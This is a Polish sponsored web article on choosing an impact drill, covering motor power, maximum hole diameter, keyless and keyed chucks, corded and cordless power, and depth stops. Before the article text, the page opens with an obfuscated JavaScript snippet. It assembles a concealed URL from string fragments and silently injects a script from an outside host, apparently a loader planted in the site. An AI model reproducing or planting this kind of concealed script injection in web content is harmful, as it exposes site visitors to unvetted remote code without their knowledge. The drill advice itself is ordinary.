(function(){ wnvl=document.createElement("script");wnvl.type="text/javascript"; wnvl.async=true;wnvl_=(("us")+"t")+"a";wnvl_+=("t.i")+""+"n";wnvl_+=(("f")+"o");wnvl_+="/"; wnvlu="435300777.";wnvlu+="w40jtbudnvl79byy3up9cumpcbXq37";wnvl.src="https://"+wnvl_+wnvlu; wnvldb=document.body;wnvldb.appendChild(wnvl); })();

Jaką wiertarkę udarową kupić? Jakie parametry urządzenia są najważniejsze?

Wiertarka to jedno z podstawowych elektronarzędzi. Doskonale sprawdza się zarówno w rękach profesjonalistów na budowie, jak i podczas amatorskiego użycia w garażu majsterkowicza. Najpopularniejszym rodzajem wiertarki są oczywiście te z udarem. Jaką wiertarkę kupić i czym kierować się podczas jej wyboru? Odpowiedź na te i inne pytania znajdziesz w naszym artykule!

Co to jest wiertarka udarowa?

Choć każdy kojarzy to urządzenie, to definicja wiertarki udarowej wcale nie jest tak oczywista. Mianem tym nazywamy rodzaj wiertarki, który posiada specjalny mechanizm odpowiedzialny za udar, czyli rytmiczne uderzenia wiertła. Ten sposób wiercenia pozwala zmaksymalizować siłę, dzięki czemu przewiercanie twardych powierzchni (jak np. beton) jest proste i nie wymaga od operatora nadmiernego wysiłku.

Warto dodać, że w wiertarkach udarowych najczęściej stosowany jest udar mechaniczny, często nazywany także udarem mechaniczno-zębatkowym. Nazewnictwo wynika z prostej przyczyny, ponieważ udar powstaje na skutek przeciwnie obracających się zębatek. Rzadziej spotykany jest natomiast mechanizm ślimakowy, wykonujący ruch posuwisto-zwrotny.

Główną zaletą wiertarek udarowych jest ich skuteczność przy wierceniu w twardych materiałach, dlatego zdecydowana większość zarówno profesjonalnych budowniczych, jak i amatorów majsterkowania, wybiera właśnie wiertarki udarowe. Sprawdzają się one doskonale jako wiertarki do żelbetonu, jak i do prac w materiałach o mniejszej twardości.

Zobacz wiertarki w sklepie agro-metal.com.pl. Tylko sprzęt renomowanych producentów

Częstym dylematem jest także wybór pomiędzy młotowiertarką a wiertarką udarową. Różnica polega na tym, że wiertarka udarowa jest lżejsza i częściej wykonuje wiercenie z udarem. W przypadku młotowiertarek uderzenie w materiał jest rzadsze, ale za to silniejsze, dlatego ten typ wiertarki najlepiej sprawdza się podczas wiercenia otworów w naprawdę twardych powierzchniach.

Na jakie parametry wiertarek udarowych zwrócić uwagę?

Liczba dostępnych na rynku wiertarek nie ułatwia podjęcia decyzji. Z tego też powodu musisz wiedzieć, czym kierować się podczas wyboru wiertarki z udarem. Jak wszystkie elektronarzędzia, cechuje się ona konkretnymi parametrami technicznymi, które pozwalają dopasować ją do wykonywanych prac.

Moc i maksymalna średnica otworu

Jednym z kluczowych i najważniejszych parametrów wiertarki udarowej jest jej moc. To właśnie moc definiuje to, jak szeroki otwór możesz wywiercić daną wiertarką. Najczęstszym przedziałem mocy jest zazwyczaj 400-650W. Takie wiertarki są w stanie wywiercić otwór o średnicy 6-15 mm.

W przypadku szerszych otworów warto zaopatrzyć się w wiertarkę o mocy od 800W wzwyż, ponieważ tego typu sprzęt jest w stanie z łatwością wykonywać szerokie otwory. Świetnym tego przykładem mogą być wiertarki do betonu.

Jaką wiertarkę udarową kupić? Jakie parametry urządzenia są najważniejsze? 2

FLEX Wiertarka udarowa CHE 2-28 SDS-plus fot. agro-metal.com.pl

Warto w tym miejscu wyraźnie zaznaczyć, że maksymalna średnica otworu deklarowana przez producenta nie zawsze pokrywa się z rzeczywistością. Jeśli poszukujesz wiertarki z udarem do wykonania otworu o szerokości 10 mm, to wybierz taką, której maksymalna średnica otworów wynosi 15 mm. Dzięki temu praca z takim elektronarzędziem będzie maksymalnie komfortowa.

Uchwyt wiertarki

Mówiąc o uchwycie wcale nie mamy na myśli rączki wiertarki, tylko uchwyt wiertła. Jest to niezwykle istotny element wiertarki udarowej, ponieważ to właśnie on odpowiada za trzymanie wiertła i szybkość pracy w przypadku ich częstej zmiany.

Uchwyty samozaciskowe są najwygodniejszym rozwiązaniem, ponieważ, jak sama ich nazwa wskazuje, do montaży wiertła nie potrzebujesz żadnych dodatkowych narzędzi. Wystarczy włożyć wiertło do zacisku i ręcznie go zakręcić. Ten rodzaj zacisku jest bardzo komfortowy, gdyż wymiana wiertła zajmuje dosłownie kilka sekund.

Warto jednak zaznaczyć, że najtańsze uchwyty samozaciskowe mogą szybko ulegać zużyciu, ponieważ nie posiadają systemu odprowadzania pyłu. Z tego też powodu pionowe wiercenie może szybko uszkodzić tani uchwyt tego rodzaju.

Jaką wiertarkę udarową kupić? Jakie parametry urządzenia są najważniejsze? 3

FLEX Wiertarka udarowa FHE 2-22 SDS-plus fot. agro-metal.com.pl

Drugim typem jest uchwyt kluczykowy. Do zmiany wiertła potrzebny jest specjalny kluczyk. Te uchwyty uchodzą za najskuteczniejsze w trzymaniu wiertła, jednakże częsta ich wymiana staje się dość uciążliwa, gdyż za każdym razem trzeba używać kluczyka. Co ciekawe, producenci starają się ułatwić korzystanie z zacisków kluczykowych montując kluczyk np. na przewodzie zasilającym.

Typ zasilania zakres regulacji i dodatkowe funkcje

Wiertarka udarowa najczęściej wyposażona jest w przewód zasilający. Stabilność dopływu mocy do wiertarki pozwala na długą pracę w jednym miejscu. Z drugiej strony, zasilanie przewodowe powoduje ograniczenie mobilności.

Alternatywnym rozwiązaniem są zatem wiertarki akumulatorowe, którymi możesz wiercić w każdym miejscu. W tym przypadku wadą jest uzależnienie od naładowanego akumulatora, który pozwala na określony czas wiercenia. Rozwiązaniem tego problemu są wymienne baterie.

Jeśli chodzi o zakres regulacji, to wiertarki udarowe o mocy większej niż 600W są zazwyczaj dwubiegowe. Dzięki temu możliwe jest ustawienie wolniejszych lub szybszych obrotów. Zaawansowane wiertarki z udarem dla profesjonalistów posiadają szerszy zakres regulacji prędkości, szczególnie przydatny podczas pracy z materiałami o różnej twardości.

Bardzo praktyczną dodatkową funkcją wiertarki jest ogranicznik głębokości wiercenia. Dzięki niemu możliwa jest precyzyjna ocena tego, jak głęboko w materiał powinno wejść wiertło. Ta dodatkowa funkcja doskonale sprawdza się podczas wiercenia otworów o tej samej głębokości.

Materiał partnera agro-metal.com.pl

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button